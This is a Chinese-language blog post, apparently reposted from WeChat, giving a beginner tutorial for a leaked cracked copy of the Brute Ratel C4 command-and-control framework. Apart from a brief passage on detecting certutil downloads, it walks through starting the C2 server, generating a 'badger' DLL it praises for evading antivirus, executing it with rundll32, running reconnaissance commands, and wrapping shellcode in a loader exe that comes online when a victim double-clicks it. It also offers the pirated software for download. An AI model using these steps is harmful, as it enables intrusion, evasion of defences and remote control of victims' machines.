BruteRatel_1.2.2初级入门教程,新手必看
2022-9-21 00:4:41 Author: 每天一个入狱小技巧(查看原文) 阅读量:377 收藏

BRC4 后渗透工具集是由Chetan Nayak(Mandiant和Crowdstrike的前红队成员)开发的攻击模拟和后利用工具包,于2020年发布。后利用工具包是一个可定制的命令和控制框架,为用户提供诸如(但不限于):将shellcode注入进程、执行脚本执行和编写C2通道(如Slack、Microsoft团队)。

许多红队和对手在取得立足点后首先执行的技术动作之一是下载其他工具。许多现代安全工具能够使用无头浏览器(headless browser)之类的工具轻松检测到攻击者。但是,蓝队有时可能会被忽视的一种攻击方法是利用系统上已经存在的现有二进制文件(LOLBins)。该方法最流行工具之一是certutil,它是Windows操作系统上的命令行程序,用作证书服务的一部分。它可用于配置证书服务、验证证书以及更多与证书相关的活动。CertUtil中的一个命令参数——urlcache,可用于执行URL缓存管理操作——攻击者已经意识到他们可以使用该工具来下载恶意文件,但是如何检测呢?

检测恶意certutil活动的一种简单方法是通过CertUtil.exe的“urlcache”参数查找正在启动下载的文件。CertUtil通常不用于从Web下载可执行文件或文件,因此当它从互联网下载文件时应被视为可疑活动。

2022年9月20日,BruteRatel_1.2.2.Scandinavian_Defense_Lic_20230101破解版泄露。

Kali 下运行文件

首先,第一步,先给文件执行权限,为了省事,我直接给777

sudo chmod 777 -R ./*

第二步,安全起见,也为了运行稳妥,先使用官方脚本执行安装必要组件和生成证书

genssl.shinstall.sh

sudo apt-get install libqt5webenginewidgets5 libqt5websockets5
## server dependenciessudo apt-get install nasm mingw-w64

第三步,运行服务端

./brute-ratel-linx64 -ratel -a admin -p [email protected] -h 172.16.208.131:8443 -sc cert.pem -sk key.pem

第四步,运行客户端

监听

生成 dll 文件

https://www.virustotal.com/gui/file-analysis/MTk1OGY4OTM0NTNmMTcxOWUwZWUyMjAwZGQ5NjVmZGE6MTY2MzY3OTkzOQ==

默认配置下,dll 免杀效果不错!

运行文件

rundll32 badger_x64.dll,main

先来个取消延时

sleep 0

获取操作系统的用户

run net user

---

1.2.2 版本目前看无法直接生成 normal exe,可以通过生成 bin 文件然后编译成 exe

借助ShellcodeLoader进行编译 exe

https://github.com/knownsec/shellcodeloader
https://github.com/knownsec/shellcodeloader/releases/download/v1.1/shellcodeLoader.7z

生成 loader.exe 可以任意改名,双击即可上线。

本文只是入门操作,其余操作需要自行挖掘。

软件下载地址在群文件,需要自取!

广

CISPPTE

CISPITIT

CISP

1

2

4

1

NISPCISPCISP


+CISP

CISACISSPCISM

 CISSPCISP

 CISP-PTE

 CISSPISO27001

CCSK

 Security++


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2MzYzNjEyMg==&mid=2247486390&idx=1&sn=baaa2b9c86723602211fa958bc0282a6&chksm=ce74d443f9035d55759954dc332c9e5a87bb9003e653addcfe04c9e4c463faca21157a6f7977#rd
如有侵权请联系:admin#unsafe.sh